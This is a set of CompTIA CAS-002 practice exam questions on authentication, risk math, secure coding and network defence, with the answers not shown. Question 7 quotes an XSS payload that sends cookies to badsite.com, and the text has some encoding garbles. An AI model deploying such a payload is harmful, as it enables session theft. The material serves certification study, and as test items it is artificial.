CompTIA CAS-002 Free Practice Questions

Question No: 6

Two separate companies are in the process of integrating their authentication infrastructure into a unified single sign-on system. Currently, both companies use an AD backend and two factor authentication using TOTP. The system administrators have configured a trust relationship between the authentication backend to ensure proper process flow. How should the employees request access to shared resources before the authentication integration is complete?

A. They should logon to the system using the username concatenated with the 6-digit code and their original password.

B. They should logon to the system using the newly assigned global username: first.lastname#### where #### is the second factor code.

C. They should use the username format: LAN\first.lastname together with their original password and the next 6-digit code displayed when the token button is depressed.

D. They should use the username format: first.lastname@company.com, together with a password and their 6-digit code.

View Answer

Question No: 7

A security administrator notices the following line in a server's security log:

<input name='credentials' type='TEXT' value='" + request.getParameter('><script>document.location='http://badsite.com/?q='document.cooki e</script>') + "'

The administrator is concerned that it will take the developer a lot of time to fix the application that is running on the server. Which of the following should the security administrator implement to prevent this particular attack?

A. WAF

B. Input validation

C. SIEM

D. Sandboxing

E. DAM

View Answer

Question No: 8

The risk manager at a small bank wants to use quantitative analysis to determine the ALE of running a business system at a location which is subject to fires during the year. A risk analyst reports to the risk manager that the asset value of the business system is $120,000 and, based on industry data, the exposure factor to fires is only 20% due to the fire suppression system installed at the site. Fires occur in the area on average every four years. Which of the following is the ALE?

A. $6,000 B. $24,000 C. $30,000 D. $96,000

View Answer

Question No: 9

An analyst connects to a company web conference hosted on www.webconference.com/meetingID#01234 and observes that numerous guests have been allowed to join, without providing identifying information. The topics covered during the web conference are considered proprietary to the company. Which of the following security concerns does the analyst present to management?

A. Guest users could present a risk to the integrity of the companyu2021s information

B. Authenticated users could sponsor guest access that was previously approved by management

C. Unauthenticated users could present a risk to the confidentiality of the companyu2021s information

D. Meeting owners could sponsor guest access if they have passed a background check

View Answer

Question No: 10

A security analyst has been asked to develop a quantitative risk analysis and risk assessment for the companyu2021s online shopping application. Based on heuristic information from the Security Operations Center (SOC), a Denial of Service Attack (DoS) has been successfully executed 5 times a year. The Business Operations department has determined the loss associated to each attack is $40,000. After implementing application caching, the number of DoS attacks was reduced to one time a year. The cost of the countermeasures was $100,000. Which of the following is the monetary value earned during the first year of operation?

A. $60,000 B. $100,000 C. $140,000 D. $200,000

View Answer

Question No: 11

The following has been discovered in an internally developed application:

Error - Memory allocated but not freed: char *myBuffer = malloc(BUFFER_SIZE); if (myBuffer != NULL) {

*myBuffer = STRING_WELCOME_MESSAGE; printf(u201cWelcome to: %s\nu201d, myBuffer);

}

exit(0);

Which of the following security assessment methods are likely to reveal this security weakness? (Select TWO).

A. Static code analysis

B. Memory dumping

C. Manual code review

D. Application sandboxing

E. Penetration testing

F. Black box testing

View Answer

Question No: 12

The Chief Executive Officer (CEO) of a company that allows telecommuting has challenged the Chief Security Officeru2021s (CSO) request to harden the corporate networku2021s perimeter. The CEO argues that the company cannot protect its employees at home, so the risk at work is no different. Which of the following BEST explains why this company should proceed with protecting its corporate network boundary?

A. The corporate network is the only network that is audited by regulators and customers.

B. The aggregation of employees on a corporate network makes it a more valuable target for attackers.

C. Home networks are unknown to attackers and less likely to be targeted directly.

D. Employees are more likely to be using personal computers for general web browsing when they are at home.

View Answer

Question No: 13

A security architect has been engaged during the implementation stage of the SDLC to review a new HR software installation for security gaps. With the project under a tight schedule to meet market commitments on project delivery, which of the following security activities should be prioritized by the security architect? (Select TWO).

A. Perform penetration testing over the HR solution to identify technical vulnerabilities

B. Perform a security risk assessment with recommended solutions to close off high-rated risks

C. Secure code review of the HR solution to identify security gaps that could be exploited

D. Perform access control testing to ensure that privileges have been configured correctly

E. Determine if the information security standards have been complied with by the project

View Answer

Question No: 14

A senior network security engineer has been tasked to decrease the attack surface of the corporate network. Which of the following actions would protect the external network interfaces from external attackers performing network scanning?

A. Remove contact details from the domain name registrar to prevent social engineering attacks.

B. Test external interfaces to see how they function when they process fragmented IP packets.

C. Enable a honeynet to capture and facilitate future analysis of malicious attack vectors.

D. Filter all internal ICMP message traffic, forcing attackers to use full-blown TCP port

A. scans against external network interfaces.

View Answer

Question No: 15

A security administrator is tasked with implementing two-factor authentication for the company VPN. The VPN is currently configured to authenticate VPN users against a backend RADIUS server. New company policies require a second factor of authentication, and the Information Security Officer has selected PKI as the second factor. Which of the following should the security administrator configure and implement on the VPN concentrator to implement the second factor and ensure that no error messages are displayed to the user during the VPN connection? (Select TWO).

A. The useru2021s certificate private key must be installed on the VPN concentrator.

B. The CAu2021s certificate private key must be installed on the VPN concentrator.

C. The user certificate private key must be signed by the CA.

D. The VPN concentratoru2021s certificate private key must be signed by the CA and installed on the VPN concentrator.

E. The VPN concentratoru2021s certificate private key must be installed on the VPN concentrator.

F. The CAu2021s certificate public key must be installed on the VPN concentrator.

View Answer